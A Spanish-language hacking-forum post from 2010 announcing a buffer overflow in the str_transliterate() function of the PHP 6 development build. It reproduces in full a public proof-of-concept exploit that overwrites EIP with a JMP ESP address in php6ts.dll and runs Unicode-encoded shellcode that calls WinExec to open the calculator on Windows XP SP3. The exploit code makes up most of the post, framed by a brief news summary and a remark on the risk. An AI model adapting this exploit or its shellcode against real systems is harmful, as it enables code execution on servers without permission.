send
Grupo de Telegram
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Buffer Overflow en PHP 6 Dev

  • 0 Respuestas
  • 1543 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado DeuSer

  • *
  • Underc0der
  • Mensajes: 65
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« en: Mayo 05, 2010, 08:54:30 pm »
Recientemente fue descubierto un fallo grave de seguridad en la versión de desarrollo de PHP 6, el lenguaje de programación mas utilizado para realizar aplicaciones web.

El problema se encuentra en la funcion str_transliterate() que permite “traducir” un texto de un lenguaje a otro, pero a su vez no valida adecuadamente los parámetros de entrada y permite la ejecución de código por medio de un buffer overflow.

Les dejo una PoC que explota esta vulnerabilidad sobre servidor Apache, corriendo en Windows XP SP3 y permite ejecutar la calculadora del sistema:

Citar
    # Title: PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
    # EDB-ID: 12051
    # CVE-ID: ()
    # OSVDB-ID: ()
    # Author: Pr0T3cT10n
    # Published: 2010-04-04
    # Verified: yes
    # Download Exploit Code
    # Download Vulnerable app

    <?php
    error_reporting(0);
    #####################################################################
    ## PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
    ## Tested on WIN XP HEB SP3, Apache, PHP 6.0 Dev
    ## Buffer Overflow
    ## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
    ## Exploited by TheLeader, Debug
    ## SP. Thanks: HDM
    ## You are not allowed to view links. Register or Login
    #####################################################################
    ## This code should exploits a buffer overflow in the str_transliterate() function to call WinExec and execute CALC
    ## Take a look, 'unicode.semantics' has to be on!
    ## php.ini > unicode.semantics = on
    #####################################################################
    if(ini_get_bool('unicode.semantics')) {
    $buff = str_repeat("u4141", 256);
    $eip = "u1445u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll
    $nops = str_repeat("u9090", 20);

    # WinExec Calc XP SP3 HEB Unicode-encoded shellcode
    $shellcode = "u02EBu05EBuF9E8uFFFFu33FFu5BC0u4388u8315u11C3uBB53u250Du7C86uD3FFu6163u636Cu414E";

    # WinExec Calc XP SP3 EN Unicode-encoded shellcode (added by muts)
    # $shellcode = "u02EBu05EBuF9E8uFFFFu33FFu5BC0u4388u8315u11C3uBB53u23ADu7C86uD3FFu6163u636Cu414E";

    $exploit = $buff.$eip.$nops.$shellcode;
    str_transliterate(0, $exploit, 0);
    } else {
    exit("Error! 'unicode.semantics' has be on!rn");
    }

    function ini_get_bool($a) {
    $b = ini_get($a);
    switch (strtolower($b)) {
    case 'on':
    case 'yes':
    case 'true':
    return 'assert.active' !== $a;
    case 'stdout':
    case 'stderr':
    return 'display_errors' === $a;
    default:
    return (bool) (int) $b;
    }
    }
    ?>

Hay que recordar que esta versión de PHP aun esta en desarrollo, pero no deja de ser inquietante este tipo de problemas de carácter critico, en un lenguaje de programación tan extendido en la red, como lo es PHP.

Mas Información:
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login

 

¿Te gustó el post? COMPARTILO!



Desbordando el buffer en linux x86 (III) [ASLR bypass]

Iniciado por q3rv0

Respuestas: 1
Vistas: 2316
Último mensaje Junio 23, 2015, 11:59:00 am
por roadd
Desbordando el buffer en linux x86 (II) [NOP Sled]

Iniciado por q3rv0

Respuestas: 2
Vistas: 1991
Último mensaje Septiembre 28, 2014, 12:15:51 pm
por Pr0ph3t
Desbordando el buffer en linux x86 (I)

Iniciado por q3rv0

Respuestas: 0
Vistas: 1699
Último mensaje Septiembre 07, 2014, 09:09:40 pm
por q3rv0
Cisco ASA Software 8.x / 9.x, IKEv1 and IKEv2 Buffer Overflow

Iniciado por sp3cial1st

Respuestas: 0
Vistas: 1672
Último mensaje Mayo 18, 2016, 09:42:57 am
por sp3cial1st
ERS Viewer 2013 ERS File Handling Buffer Overflow

Iniciado por Mayk0

Respuestas: 0
Vistas: 1330
Último mensaje Julio 09, 2013, 05:47:36 pm
por Mayk0